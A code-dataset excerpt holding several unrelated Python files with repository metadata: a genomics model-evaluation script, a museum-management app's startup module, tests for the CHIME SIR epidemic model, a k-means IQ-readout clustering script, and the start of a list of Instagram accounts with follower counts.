\"/home/changhwan/amc/08.Analysis/34.revision/00_inputs/\"\nf2_cnv = indir+\"02_Asan169_cnv_exon_header2.txt\"\nf2_hla = indir+\"Asan169_normal_HLA.txt\"\nf2_gt = indir+\"VQSR_nonsyn_169_header.txt\"\n#f2_cli = \"/home/changhwan/amc/01.Clinial_info/ver14_220419/Processed_metadata_feat\"\nf2_cli = \"/home/changhwan/amc/01.Clinial_info/ver15_221211/Processed_metadata_feat\"\n#f2_lab = \"/home/changhwan/amc/01.Clinial_info/ver14_220419/Processed_metadata_lab_final\"\nf2_lab = \"/home/changhwan/amc/01.Clinial_info/ver15_221211/Processed_metadata_lab_final\"\n\n# snp\ndf2_gt_tmp = pd.read_csv(f2_gt, sep=\"\\t\", index_col=0)\nlst_sm = list(df2_gt_tmp.columns)\nlst_new = [x.split(\"D-\")[1] for x in lst_sm]\ndf2_gt_tmp.columns = lst_new\ndf2_gt = df2_gt_tmp.T\n\n# cnv\ndf2_cnv_tmp = pd.read_csv(f2_cnv, sep=\"\\t\",index_col=0)\ndf2_cnv_tmp = df2_cnv_tmp.drop(\"gene\",axis=1)\n# change the format of sample name\nlst_sm = list(df2_cnv_tmp.columns)\nlst_new = [x.split(\"D-\")[1] for x in lst_sm]\ndf2_cnv_tmp.columns = lst_new\ndf2_cnv = df2_cnv_tmp.T\nlst_sm2 = list(df2_cnv.index)\n\n# lab\ndf2_lab = pd.read_csv(f2_lab, sep=\"\\t\", index_col=0)\nlst_sm_lab = list(df2_lab.index)\nlst_final = list(set(lst_sm2) & set(lst_sm_lab))\ndf2_lab_sub = df2_lab.loc[lst_final, type_]\n\n# hla\ndf2_hla = pd.read_csv(f2_hla, sep=\"\\t\", index_col=0, header=None)\nlst_sm = list(df2_hla.index)\nlst_new = [x.split(\"D-\")[1] for x in lst_sm]\ndf2_hla.index = lst_new\n#hla_inc = [3,4,7,8,11,12,15,16] # B,C,DRB1,DQB1,DPB1 => B,DRB1, DQB1, DPB1\nhla_inc = [1,2,3,4,5,6,7,8,11,12,15,16] # A,B,C,DRB1, DQB1, DPB1\ndf2_hla = df2_hla.loc[:,hla_inc]\ndf2_hla_stacked = df2_hla.stack().str.get_dummies().sum(level=0)\n\n# cli\ndf2_cli = pd.read_csv(f2_cli, sep=\"\\t\", index_col=0)\ndf2_cov = pd.merge(df2_cli, df_drug[\"MONO\"], left_index=True, right_index=True)\ndf2_cov.Sex = df2_cov.Sex - 1\n\n# merge\n#dfs2 = [df2_cov, df2_hla_stacked, df2_cnv, df2_gt, df2_lab_sub]\ndfs2 = [df2_cov, df2_hla_stacked, df2_gt, df2_lab_sub]\ndf2_merge_tmp = pd.concat(dfs2, join=\"inner\", axis=1, sort=True)\ndf2_merge = df2_merge_tmp.loc[df2_merge_tmp[\"MONO\"]==1,:]\ndf2_test = df2_merge[lst_feat].dropna()\nlst_test = list(df2_test.index)\ntest_y = df2_merge.loc[lst_test, type_]\n#df2_test_tmp = pd.merge(df2_test, test_y, how=\"inner\", left_index=True, right_index=True)\n#df_total = pd.concat([df_merge_sub, df2_test_tmp])\n\narray_test = sc_final.transform(df2_test)\ndf2_test_sc = pd.DataFrame(array_test, index=df2_test.index, columns=df2_test.columns)\n\n#### prediction\n\n## DNN\ninp_X = T.Tensor(df2_test_sc.to_numpy())\nmodel = model.eval()\npred_y = model(inp_X)\nap_dnn = average_precision_score(test_y.to_numpy(), pred_y.detach().numpy())\nroc_dnn = roc_auc_score(test_y.to_numpy(), pred_y.detach().numpy())\n\n## XGB\nxgb_from_joblib = joblib.load('best_estimator3_xgb.pkl')\npred_y_xgb = xgb_from_joblib.predict(df2_test)\nap_xgb = average_precision_score(test_y, pred_y_xgb)\nroc_xgb = roc_auc_score(test_y, pred_y_xgb)\n\n## SVM\nsvm_from_joblib = joblib.load('best_estimator3_svm.pkl')\npred_y_svm = svm_from_joblib.predict(df2_test_sc)\nap_svm = average_precision_score(test_y, pred_y_svm)\nroc_svm = roc_auc_score(test_y, pred_y_svm)\n\n## RF\nrf_from_joblib = joblib.load('best_estimator3_rf.pkl')\npred_y_rf = rf_from_joblib.predict(df2_test)\nap_rf = average_precision_score(test_y, pred_y_rf)\nroc_rf = roc_auc_score(test_y, pred_y_rf)\n\n# save the result\nf_res_test = open(\"results_test_NC.tsv\",\"w\")\nf_res_test.write(\"ap_xgb : %f\\nap_svm : %f\\nap_rf : %f\\nap_dnn : %f\\n\"%(ap_xgb, ap_svm, ap_rf, ap_dnn))\nf_res_test.write(\"roc_xgb : %f\\nroc_svm : %f\\nroc_rf : %f\\nroc_dnn : %f\\n\"%(roc_xgb, roc_svm, roc_rf, roc_dnn))\nf_res_test.close()\n","repo_name":"kaistomics/GERMirAE","sub_path":"GERMirAE.py","file_name":"GERMirAE.py","file_ext":"py","file_size_in_byte":21181,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23213359076","text":"import ctypes\nimport datetime\nimport os\nimport random\nimport string\nimport sys\nimport time\nfrom threading import Thread\n\nimport schedule\nimport win32gui\nimport winotify\nfrom PyQt5.QtWidgets import QApplication\n\nfrom backend.high_level.clientela.enum.tariffa import Tariffa\nfrom backend.high_level.clientela.enum.tipo_abbonamento import TipoAbbonamento\nfrom backend.high_level.gestione_interna.opera import Opera\nfrom frontend.controller.amministrazione.controller_gestione_dipendenti import ControllerGestioneDipendenti\nfrom frontend.controller.amministrazione.controller_home_amministrazione import ControllerHomeAmministrazione\nfrom frontend.controller.controller_home import ControllerHome\nfrom frontend.controller.reception.controller_acquisto_biglietto import ControllerAcquistoBiglietto\nfrom frontend.controller.reception.controller_home_reception import ControllerHomeReception\nfrom frontend.controller.reception.controller_ricerca_opera import ControllerRicercaOpera\nfrom frontend.controller.segreteria.controller_home_segreteria import ControllerHomeSegreteria\nfrom frontend.ui.location import UI_DIR\nfrom frontend.view.amministrazione.vista_gestione_dipendenti import VistaGestioneDipendenti\nfrom frontend.view.amministrazione.vista_home_amministrazione import VistaHomeAmministrazione\nfrom frontend.view.reception.vista_acquisto_biglietto import VistaAcquistoBiglietto\nfrom frontend.view.reception.vista_home_reception import VistaHomeReception\nfrom frontend.view.reception.vista_ricerca_opera import VistaRicercaOpera\nfrom frontend.view.segreteria.vista_home_segreteria import VistaHomeSegreteria\nfrom frontend.view.vista_home import VistaHome\n\n\n# for name, value in locals().items():\n# setattr(self,name, value)\ndef popolaMuseo():\n from backend.high_level.museo import Museo\n from backend.high_level.clientela.biglietto import Biglietto\n from backend.high_level.clientela.enum.sesso import Sesso\n from backend.high_level.clientela.visitatore import Visitatore\n from backend.high_level.clientela.cliente import Cliente\n from backend.high_level.clientela.abbonamento import Abbonamento\n from backend.high_level.gestione_interna.enum.reparto_museo import RepartoMuseo\n from backend.high_level.gestione_interna.enum.periodo_storico import PeriodoStorico\n\n museo = Museo.getInstance()\n\n # creo i biglietti per i visitatori e per i clienti\n biglietti = [Biglietto() for _ in range(500)]\n for biglietto in biglietti:\n biglietto.date_convalida.append(\n datetime.datetime.strptime(str(random.randrange(1, 28)) + '/10/2022', '%d/%m/%Y'))\n # aggiungo i visitatori\n visitatori = []\n for i in range(random.randrange(50, 150)):\n visitatori.append(\n Visitatore(\n provenienza=random.choices(['ITA', 'FRA', 'GER', 'ING', 'AMERICA'], [4, 1, 1, 1, 2])[0],\n dataNascita=datetime.datetime.strptime('10/02/' + str(random.randrange(1920, 2020)), '%d/%m/%Y'),\n sesso=random.choices([Sesso.MASCHIO, Sesso.FEMMINA, Sesso.NON_SPECIFICATO], [3, 3, 1])[0],\n biglietti=[biglietti[i]],\n )\n )\n # aggiungo i biglietti ai visitatori\n for visitatore in visitatori:\n visitatore.biglietti.extend(\n [Biglietto(\n reparto=random.choice([e for e in RepartoMuseo]),\n tariffa=random.choice([e for e in Tariffa]),\n dataRilascio=datetime.datetime.strptime(\n str(random.randrange(1, 28)) + '/' + str(random.randrange(1, 13)) + '/2022', '%d/%m/%Y'),\n turno=random.choice([None, *museo.turni_guida]),\n ) for _ in range(random.randrange(1, 50))]\n )\n\n museo.visitatori.extend(visitatori)\n\n # aggiungo i clienti\n clienti = []\n for i in range(random.randrange(30, 80)):\n # aggiungo gli abbonamenti ai clienti\n abbonamenti = [\n Abbonamento(\n dataRilascio=datetime.datetime.strptime('15/' + str(random.randrange(1, 13)) + '/2022', '%d/%m/%Y'),\n tipo=random.choice([e for e in TipoAbbonamento])\n ) for _ in range(random.randrange(1, 3))]\n for abbonamento in abbonamenti:\n abbonamento.date_convalida.extend(\n [datetime.datetime.strptime(str(random.randrange(1, 28)) + '/' +\n str(random.randrange(1, 13)) + '/2022', '%d/%m/%Y') for _ in\n range(random.randrange(5, 50))]\n )\n rinnovi = {\n datetime.datetime.strptime('10/' + str(random.randrange(1, 13)) + '/2022', '%d/%m/%Y'):\n random.choice([e for e in TipoAbbonamento]) for _ in range(random.randrange(1, 10))\n }\n abbonamento.date_rinnovo = {**abbonamento.date_rinnovo, **rinnovi}\n\n clienti.append(\n Cliente(\n nome='pippo',\n cognome='baudo',\n codFis='AAA',\n prov=random.choices(['ITA', 'FRA', 'GER', 'ING', 'AMERICA'], [4, 1, 1, 1, 2])[0],\n nasc=datetime.datetime.strptime('10/02/' + str(random.randrange(1920, 2020)), '%d/%m/%Y'),\n sesso=random.choices([e for e in Sesso], [3, 3, 1, 0])[0],\n biglietti=[biglietti[i + 150]],\n abbonamenti=abbonamenti,\n )\n )\n museo.visitatori.extend(clienti)\n\n # aggiungo le opere\n opere = []\n for i in range(50):\n opera = Opera(\n autore=random.choice(['Picasso', 'Botticelli', 'DaVinci', 'Raffaello', 'Michelangelo', 'Dalì', 'Klimt']),\n titolo=''.join(random.choice(string.ascii_lowercase) for _ in range(5)),\n descrizione='',\n immagine=None,\n costo=random.randrange(100, 5000),\n reparto=random.choice([e for e in RepartoMuseo]),\n periodo=random.choice([e for e in PeriodoStorico]),\n )\n rand_data = datetime.datetime.strptime('20/' + str(random.randrange(1, 13)) + '/2022', '%d/%m/%Y')\n rand = random.randrange(0, 3)\n if rand == 1:\n opera.data_vendita = rand_data\n elif rand == 2:\n opera.data_acquisto = rand_data\n opere.append(opera)\n\n museo.opere.extend(opere)\n museo.make_backup()\n\n\ndef startApp():\n # fix icona non visibile\n myappid = 'museum.1.0'\n ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)\n\n app = QApplication(sys.argv)\n\n # MVC\n vista_home = VistaHome()\n # controller_home = ControllerHome(vista_home)\n # from backend.high_level.personale.dipendente import Dipendente\n # controller_home = ControllerHomeReception(VistaHomeReception(), ControllerHome(vista_home),None)\n # Dipendente('a', 'b', datetime.datetime.now()))\n controller_home=ControllerHome(vista_home)\n sys.exit(app.exec())\ndef font_presenti():\n def callback(font, tm, fonttype, names):\n names.append(font.lfFaceName)\n return True\n font_names = []\n hdc = win32gui.GetDC(None)\n win32gui.EnumFontFamilies(hdc, None, callback, font_names)\n win32gui.ReleaseDC(hdc, None)\n\n if not 'Lato' in font_names or not 'Lato Light' in font_names:\n notifica = winotify.Notification(\n app_id='Museo Omero',\n title='Font necessari [Lato]',\n msg='Per favore, installa i seguenti fonts e poi riavvia il software',\n icon=UI_DIR + '/ico/museum_white.ico',\n duration='short',\n )\n notifica.set_audio(winotify.audio.Default,False)\n notifica.show()\n\n time.sleep(3)\n os.startfile(UI_DIR+'/fonts/Lato-Regular.ttf')\n os.startfile(UI_DIR+'/fonts/Lato-Light.ttf')\n os.startfile(UI_DIR+'/fonts/Lato-LightItalic.ttf')\n os._exit(1)\n\n\ndef scheduler():\n def action():\n from backend.high_level.museo import Museo\n from backend.high_level.clientela.cliente import Cliente\n\n museo = Museo.getInstance()\n # backup del museo\n museo.make_backup()\n # e-mail abbonamenti\n for cliente in museo.visitatori:\n if isinstance(cliente, Cliente):\n for abbonamento in cliente.abbonamenti:\n if abbonamento.giorniAllaScadenza() ==5:\n cliente.notification.send(title=\"Museo Omero: scadenza prossima.\",\n content=\"Si comunica che il Suo abbonamento scadrà tra 5 giorni.\"\n \" Si prega di rinnovarlo.\\n Cordiali saluti.\\nLo staff.\")\n schedule.every().day.at(\"23:59\").do(action)\n while True:\n schedule.run_pending()\n time.sleep(10)\n\n\nif __name__ == '__main__':\n #popolaMuseo()\n thread = Thread(target=scheduler)\n # thread.start()\n font_presenti()\n startApp()","repo_name":"MrPio/MuseoOmero-Python","sub_path":"frontend/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8859,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74909812647","text":"from datetime import date\n\nimport pytest\nimport pandas as pd\nimport numpy as np\nfrom datetime import timedelta\n\nfrom penn_chime.constants import EPSILON\nfrom penn_chime.model.sir import (\n sir,\n sim_sir,\n get_growth_rate,\n Sir,\n)\n\n\ndef test_sir():\n \"\"\"\n Someone who is good at testing, help\n \"\"\"\n sir_test = sir(100, 1, 0, 0.2, 0.5, 1)\n assert sir_test == (\n 0.7920792079207921,\n 0.20297029702970298,\n 0.0049504950495049506,\n ), \"This contrived example should work\"\n\n assert isinstance(sir_test, tuple)\n for v in sir_test:\n assert isinstance(v, float)\n assert v >= 0\n\n # Certain things should *not* work\n with pytest.raises(TypeError) as error:\n sir(\"S\", 1, 0, 0.2, 0.5, 1)\n assert str(error.value) == \"can't multiply sequence by non-int of type 'float'\"\n\n with pytest.raises(TypeError) as error:\n sir(100, \"I\", 0, 0.2, 0.5, 1)\n assert str(error.value) == \"can't multiply sequence by non-int of type 'float'\"\n\n with pytest.raises(TypeError) as error:\n sir(100, 1, \"R\", 0.2, 0.5, 1)\n assert str(error.value) == \"unsupported operand type(s) for +: 'float' and 'str'\"\n\n with pytest.raises(TypeError) as error:\n sir(100, 1, 0, \"beta\", 0.5, 1)\n assert str(error.value) == \"bad operand type for unary -: 'str'\"\n\n with pytest.raises(TypeError) as error:\n sir(100, 1, 0, 0.2, \"gamma\", 1)\n assert str(error.value) == \"unsupported operand type(s) for -: 'float' and 'str'\"\n\n with pytest.raises(TypeError) as error:\n sir(100, 1, 0, 0.2, 0.5, \"N\")\n assert str(error.value) == \"unsupported operand type(s) for /: 'str' and 'float'\"\n\n # Zeros across the board should fail\n with pytest.raises(ZeroDivisionError):\n sir(0, 0, 0, 0, 0, 0)\n\n\ndef test_sim_sir():\n \"\"\"\n Rounding to move fast past decimal place issues\n \"\"\"\n raw = sim_sir(\n 5, 6, 7, 0.1, 0, [(0.1, 40)], # s # i # r # gamma # i_day # beta1 # n_days1\n )\n\n assert round(raw[\"susceptible\"][0], 0) == 5\n assert round(raw[\"infected\"][0], 2) == 6\n assert round(raw[\"recovered\"][0], 0) == 7\n assert round(raw[\"susceptible\"][-1], 2) == 0\n assert round(raw[\"infected\"][-1], 2) == 0.18\n assert round(raw[\"recovered\"][-1], 2) == 17.82\n\n\ndef test_growth_rate():\n assert np.round(get_growth_rate(5) * 100.0, decimals=4) == 14.8698\n assert np.round(get_growth_rate(0) * 100.0, decimals=4) == 0.0\n assert np.round(get_growth_rate(-4) * 100.0, decimals=4) == -15.9104\n\n\ndef test_model(model, param):\n # test the Model\n\n assert round(model.infected, 0) == 45810.0\n assert isinstance(model.infected, float) # based off note in models.py\n\n # test the class-calculated attributes\n # we're talking about getting rid of detection probability\n # assert model.detection_probability == 0.125\n assert model.intrinsic_growth_rate == 0.12246204830937302\n assert abs(model.beta - 4.21501347256401e-07) < EPSILON\n assert model.r_t == 2.307298374881539\n assert model.r_naught == 2.7144686763312222\n assert model.doubling_time_t == 7.764405988534983\n assert model.i_day == 43\n\n\ndef test_model_first_hosp_fit(param):\n param.date_first_hospitalized = param.current_date - timedelta(days=43)\n param.doubling_time = None\n\n my_model = Sir(param)\n\n assert abs(my_model.intrinsic_growth_rate - 0.123) / 0.123 < 0.01\n assert abs(my_model.beta - 4.21501347256401e-07) < EPSILON\n assert abs(my_model.r_t - 2.32) / 2.32 < 0.01\n assert abs(my_model.r_naught - 2.72) / 2.72 < 0.01\n assert abs(my_model.doubling_time_t - 7.71)/7.71 < 0.01\n\n\ndef test_model_raw_start(model, param):\n raw_df = model.raw_df\n\n # test the things n_days creates, which in turn tests sim_sir, sir, and get_dispositions\n\n # print('n_days: %s; i_day: %s' % (param.n_days, model.i_day))\n assert len(raw_df) == (len(np.arange(-model.i_day, param.n_days + 1))) == 104\n\n first = raw_df.iloc[0, :]\n second = raw_df.iloc[1, :]\n\n assert first.susceptible == 499600.0\n assert round(second.infected, 0) == 449.0\n assert list(model.dispositions_df.loc[0, [\n \"day\",\n \"date\",\n \"ever_hospitalized\",\n \"ever_icu\",\n \"ever_ventilated\",\n ]]) == [\n -43,\n date(year=2020, month=2, day=14),\n 1.0,\n 0.4,\n 0.2,\n ]\n assert round(raw_df.recovered[30], 0) == 7083.0\n\n d, dt, hosp, icu, vent = list(model.dispositions_df.loc[60, [\n \"day\",\n \"date\",\n \"ever_hospitalized\",\n \"ever_icu\",\n \"ever_ventilated\",\n ]])\n assert dt == date(year=2020, month=4, day=14)\n assert [round(v, 0) for v in (d, hosp, icu, vent)] == [17, 549.0, 220.0, 110.0]\n\n\ndef test_model_conservation(param, model):\n raw_df = model.raw_df\n\n assert (0.0 <= raw_df.susceptible).all()\n assert (0.0 <= raw_df.infected).all()\n assert (0.0 <= raw_df.recovered).all()\n\n diff = raw_df.susceptible + raw_df.infected + raw_df.recovered - param.population\n assert (diff < 0.1).all()\n\n assert (raw_df.susceptible <= param.population).all()\n assert (raw_df.infected <= param.population).all()\n assert (raw_df.recovered <= param.population).all()\n\n\ndef test_model_raw_end(param, model):\n raw_df = model.raw_df\n last = raw_df.iloc[-1, :]\n assert round(last.susceptible, 0) == 83391.0\n\n\ndef test_model_monotonicity(param, model):\n raw_df = model.raw_df\n\n # Susceptible population should be non-increasing, and Recovered non-decreasing\n assert (raw_df.susceptible[1:] - raw_df.susceptible.shift(1)[1:] <= 0).all()\n assert (raw_df.recovered[1:] - raw_df.recovered.shift(1)[1:] >= 0).all()\n\n\ndef test_model_cumulative_census(param, model):\n # test that census is being properly calculated\n raw_df = model.raw_df\n admits_df = model.admits_df\n df = pd.DataFrame(\n {\n \"hospitalized\": admits_df.admits_hospitalized,\n \"icu\": admits_df.admits_icu,\n \"ventilated\": admits_df.admits_ventilated,\n }\n )\n admits = df.cumsum()\n\n # 1.0 is for the one hospital patient on the first day, who won't appear in the admissions\n diff = admits.hospitalized[1:-1] - (\n param.market_share * param.hospitalized.rate * (raw_df.infected[1:-1] + raw_df.recovered[1:-1]) - 1.0\n )\n assert (diff.abs() < 0.1).all()\n","repo_name":"CodeForPhilly/chime","sub_path":"tests/penn_chime/model/test_sir.py","file_name":"test_sir.py","file_ext":"py","file_size_in_byte":6343,"program_lang":"python","lang":"en","doc_type":"code","stars":206,"dataset":"github-code","pt":"53"} +{"seq_id":"27116489830","text":"\nfrom cProfile import label\nfrom numpy import array, reshape, mean, transpose, ndarray\nfrom sklearn.cluster import KMeans\n\n\n\ndef get_KmeansSklearn( n_clusters, iqComplex )->KMeans:\n data = complex_to_vector(iqComplex, vectorShape=\"H\")\n kmeans = KMeans(n_clusters=n_clusters,tol=1e-4).fit(data)\n return kmeans\n\ndef get_population( iqCenter:ndarray, iqComplex:ndarray ):\n #print(iqCenter, iqComplex)\n myKmean = get_KmeansSklearn(2,iqCenter)\n iqVectData = complex_to_vector(iqComplex,vectorShape=\"H\")\n clusterData = myKmean.predict(iqVectData.reshape((iqComplex.size,2)))\n\n return mean(clusterData.reshape(iqComplex.shape),axis=iqComplex.ndim-1)\n\ndef complex_to_vector( complexArray:ndarray, vectorShape=\"V\" ):\n transArr = array([complexArray.real,complexArray.imag])\n if vectorShape == \"V\":\n return transArr\n elif \"H\":\n if complexArray.ndim == 2:\n return transArr.transpose((1,2,0))\n if complexArray.ndim == 1:\n return transArr.transpose((1,0))\n\ndef vector_to_complex( vectorArray ):\n newVectorArray = vectorArray.transpose()\n print(newVectorArray)\n complexArray = newVectorArray[0]+1j*newVectorArray[1]\n return complexArray\n\ndef get_projectedIQVector_byTwoPt( projComplex, iqComplex ):\n refPoint = mean(projComplex)\n shiftedIQComplex = iqComplex-refPoint\n relativeProjComplex = projComplex[0]-refPoint\n projectionVector = complex_to_vector(array([relativeProjComplex]),\"H\")\n shiftedIQVector = complex_to_vector(shiftedIQComplex,\"V\")\n projectionMatrix = projectionVector.transpose()@projectionVector/abs(relativeProjComplex)**2\n projectedVector = projectionMatrix@shiftedIQVector\n return projectedVector\n\ndef get_projectedIQDistance_byTwoPt( projComplex, iqComplex ):\n refPoint = mean(projComplex)\n shiftedIQComplex = iqComplex-refPoint\n relativeProjComplex = projComplex[0]-refPoint\n projectionVector = complex_to_vector(array([relativeProjComplex]),\"H\")\n shiftedIQVector = complex_to_vector(shiftedIQComplex,\"V\")\n projectedDistance = projectionVector@shiftedIQVector/abs(relativeProjComplex)\n return projectedDistance[0]\n\ndef get_simulationData(measurementPts, excitedProbability, iqPosition, sigma):\n excPts = int(measurementPts*excitedProbability)\n groundProbability = 1-excitedProbability\n groundPts = int(measurementPts*groundProbability)\n gpos=iqPosition[0]\n epos=iqPosition[1]\n g = np.random.normal(gpos.real, sigma, groundPts)+1j*np.random.normal(gpos.imag, sigma, groundPts)\n e = np.random.normal(epos.real, sigma, excPts)+1j*np.random.normal(epos.imag, sigma, excPts)\n\n iqdata = np.append(g,e) \n return iqdata\n\ndef get_oneShot_kmeanDistance(iqdata):\n\n km = get_KmeansSklearn(2,iqdata)\n clusterCenter = km.cluster_centers_.transpose()\n clusterCenter = clusterCenter[0]+1j*clusterCenter[1]\n projectedDistance = get_projectedIQDistance_byTwoPt(clusterCenter,iqdata)\n #b = get_projectedIQVector_byTwoPt(clusterCenter,iqdata)\n return projectedDistance\n\ndef get_oneshot_plot(iqdata,simIQCenter=None):\n km = get_KmeansSklearn(2,iqdata)\n clusterCenter = vector_to_complex(km.cluster_centers_)\n a = get_projectedIQDistance_byTwoPt(clusterCenter,iqdata)\n plt.figure(1)\n plt.plot( iqdata.real, iqdata.imag, \"o\", label=\"Data\" )\n plt.plot( clusterCenter.real, clusterCenter.imag, \"o\", label=\"KMeans\" )\n #if simIQCenter != None:\n simCenter = array(simIQCenter).transpose()\n plt.plot( simCenter.real, simCenter.imag,\"ro\", label=\"Simulation\" )\n plt.figure(2)\n count, bins, ignored = plt.hist(a, 60, density=True)\n plt.show()\ndef population_test(simCenter,measurementPts,ProbabilityRange,statisticTest=20):\n statisticTest = int(statisticTest)\n errorDistanceMean = np.empty(ProbabilityRange.shape[-1])\n errorDistanceSTD = np.empty(ProbabilityRange.shape[-1])\n for i,excitedProbability in enumerate(ProbabilityRange):\n\n ed = np.empty(statisticTest)\n for j in range(statisticTest):\n km = get_KmeansSklearn(2,get_simulationData(measurementPts,excitedProbability,simCenter,sigma))\n clusterCenter = km.cluster_centers_.transpose()\n clusterCenter = clusterCenter[0]+1j*clusterCenter[1]\n errorDistanceP1 = mean(abs(simCenter.transpose()-clusterCenter))\n\n clusterCenterP2 = array([clusterCenter[1],clusterCenter[0]])\n errorDistanceP2 = mean(abs(simCenter.transpose()-clusterCenterP2))\n\n ed[j] = np.min([errorDistanceP1,errorDistanceP2])\n errorDistanceMean[i] = np.mean(ed)\n errorDistanceSTD[i] = np.std(ed)\n plt.figure(1)\n plt.errorbar( ProbabilityRange, errorDistanceMean, yerr=errorDistanceSTD, fmt=\"ro\" )\n plt.show()\nif __name__ == \"__main__\":\n import matplotlib.pyplot as plt\n import numpy as np\n\n\n simQICenter = array([1+1j,1+2j])\n #print(simQICenter)\n measurementPts = 1000\n sigma = 0.2\n #get_oneshot_plot(get_simulationData(measurementPts,0.5,simQICenter,sigma),simIQCenter=simQICenter)\n statisticTest = int(20)\n ProbabilityRange = np.linspace(0.1,0.9,9)\n # testComplex = array([[0+1j,1+1j],[2+2j,3+3j],[4+4j,5+5j]])\n # print(testComplex)\n # print(complex_to_vector(testComplex))\n # print(complex_to_vector(testComplex, vectorShape=\"H\"))\n\n\n # testComplex = array([0+1j,2+3j])\n # print(testComplex)\n # print(complex_to_vector(testComplex))\n # print(complex_to_vector(testComplex, vectorShape=\"H\"))\n # testComplex = array([[1,2],[3,4]])\n # print(vector_to_complex(testComplex))\n data = array([get_simulationData(measurementPts,0.5,simQICenter,sigma),get_simulationData(measurementPts,0.25,simQICenter,sigma)])\n #data = get_simulationData(measurementPts,0.7,simQICenter,sigma)\n\n #print(data)\n print(get_population(simQICenter,data))\n #population_test(simCenter,measurementPts,ProbabilityRange,statisticTest=20)\n \n ","repo_name":"asqum/PYQUM","sub_path":"TEST/BETAsite/state_distinguishability/state_distinguishability/iq_kmean.py","file_name":"iq_kmean.py","file_ext":"py","file_size_in_byte":5922,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"72849590568","text":"data = [\n {\n 'name': 'Instagram',\n 'follower_count': 346,\n 'description': 'Social media platform',\n 'country': 'United States'\n },\n {\n 'name': 'Cristiano Ronaldo',\n 'follower_count': 215,\n 'description': 'Footballer',\n 'country': 'Portugal'\n },\n {\n 'name': 'Ariana Grande',\n 'follower_count': 183,\n 'description': 'Musician and actress',\n 'country': 'United States'\n },\n {\n 'name': 'Dwayne Johnson',\n 'follower_count': 181,\n 'description': 'Actor and professional wrestler',\n 'country': 'United States'\n },\n {\n 'name': 'Selena Gomez',\n 'follower_count': 174,\n 'description': 'Musician and actress',\n 'country': 'United States'\n },\n {\n 'name': 'Kylie Jenner',\n 'follower_count': 172,\n 'description': 'Reality TV personality and businesswoman and Self-Made Billionaire',\n 'country': 'United States'\n },\n {\n 'name': 'Kim Kardashian',\n 'follower_count': 167,\n 'description': 'Reality TV personality and businesswoman',\n 'country': 'United States'\n },\n {\n 'name': 'Lionel Messi',\n 'follower_count': 149,\n 'description': 'Footballer',\n 'country': 'Argentina'\n },\n {\n 'name': 'Beyoncé',\n 'follower_count': 145,\n 'description': 'Musician',\n 'country': 'United States'\n },\n {\n 'name': 'Neymar',\n 'follower_count': 138,\n 'description': 'Footballer',\n 'country': 'Brasil'\n },\n {\n 'name': 'National Geographic',\n 'follower_count': 135,\n 'description': 'Magazine',\n 'country': 'United States'\n },\n {\n 'name': 'Justin Bieber',\n 'follower_count': 133,\n 'description': 'Musician',\n 'country': 'Canada'\n },\n {\n 'name': 'Taylor Swift',\n 'follower_count': 131,\n 'description': 'Musician',\n 'country': 'United States'\n },\n {\n 'name': 'Kendall Jenner',\n 'follower_count': 127,\n 'description': 'Reality TV personality and Model',\n 'country': 'United States'\n },\n {\n 'name': 'Jennifer Lopez',\n 'follower_count': 119,\n 'description': 'Musician and actress',\n 'country': 'United States'\n },\n {\n 'name': 'Nicki Minaj',\n 'follower_count': 113,\n 'description': 'Musician',\n 'country': 'Trinidad and Tobago'\n },\n {\n 'name': 'Nike',\n 'follower_count': 109,\n 'description': 'Sportswear multinational',\n 'country': 'United States'\n },\n {\n 'name': 'Khloé Kardashian',\n 'follower_count': 108,\n 'description': 'Reality TV personality and businesswoman',\n 'country': 'United States'\n },\n {\n 'name': 'Miley Cyrus',\n 'follower_count': 107,\n 'description': 'Musician and actress',\n 'country': 'United States'\n },\n {\n 'name': 'Katy Perry',\n 'follower_count': 94,\n 'description': 'Musician',\n 'country': 'United States'\n },\n {\n 'name': 'Kourtney Kardashian',\n 'follower_count': 90,\n 'description': 'Reality TV personality',\n 'country': 'United States'\n },\n {\n 'name': 'Kevin Hart',\n 'follower_count': 89,\n 'description': 'Comedian and actor',\n 'country': 'United States'\n },\n {\n 'name': 'Ellen DeGeneres',\n 'follower_count': 87,\n 'description': 'Comedian',\n 'country': 'United States'\n },\n {\n 'name': 'Real Madrid CF',\n 'follower_count': 86,\n 'description': 'Football club',\n 'country': 'Spain'\n },\n {\n 'name': 'FC Barcelona',\n 'follower_count': 85,\n 'description': 'Football club',\n 'country': 'Spain'\n },\n {\n 'name': 'Rihanna',\n 'follower_count': 81,\n 'description': 'Musician and businesswoman',\n 'country': 'Barbados'\n },\n {\n 'name': 'Demi Lovato',\n 'follower_count': 80,\n 'description': 'Musician and actress',\n 'country': 'United States'\n },\n {\n 'name': \"Victoria's Secret\",\n 'follower_count': 69,\n 'description': 'Lingerie brand',\n 'country': 'United States'\n },\n {\n 'name': 'Zendaya',\n 'follower_count': 68,\n 'description': 'Actress and musician',\n 'country': 'United States'\n },\n {\n 'name': 'Shakira',\n 'follower_count': 66,\n 'description': 'Musician',\n 'country': 'Colombia'\n },\n {\n 'name': 'Drake',\n 'follower_count': 65,\n 'description': 'Musician',\n 'country': 'Canada'\n },\n {\n 'name': 'Chris Brown',\n 'follower_count': 64,\n 'description': 'Musician',\n 'country': 'United States'\n },\n {\n 'name': 'LeBron James',\n 'follower_count': 63,\n 'description': 'Basketball player',\n 'country': 'United States'\n },\n {\n 'name': 'Vin Diesel',\n 'follower_count': 62,\n 'description': 'Actor',\n 'country': 'United States'\n },\n {\n 'name': 'Cardi B',\n 'follower_count': 67,\n 'description': 'Musician',\n 'country': 'United States'\n },\n {\n 'name': 'David Beckham',\n 'follower_count': 82,\n 'description': 'Footballer',\n 'country': 'United Kingdom'\n },\n {\n 'name': 'Billie Eilish',\n 'follower_count': 61,\n 'description': 'Musician',\n 'country': 'United States'\n },\n {\n 'name': 'Justin Timberlake',\n 'follower_count': 59,\n 'description': 'Musician and actor',\n 'country': 'United States'\n },\n {\n 'name': 'UEFA Champions League',\n 'follower_count': 58,\n 'description': 'Club football competition',\n 'country': 'Europe'\n },\n {\n 'name': 'NASA',\n 'follower_count': 56,\n 'description': 'Space agency',\n 'country': 'United States'\n },\n {\n 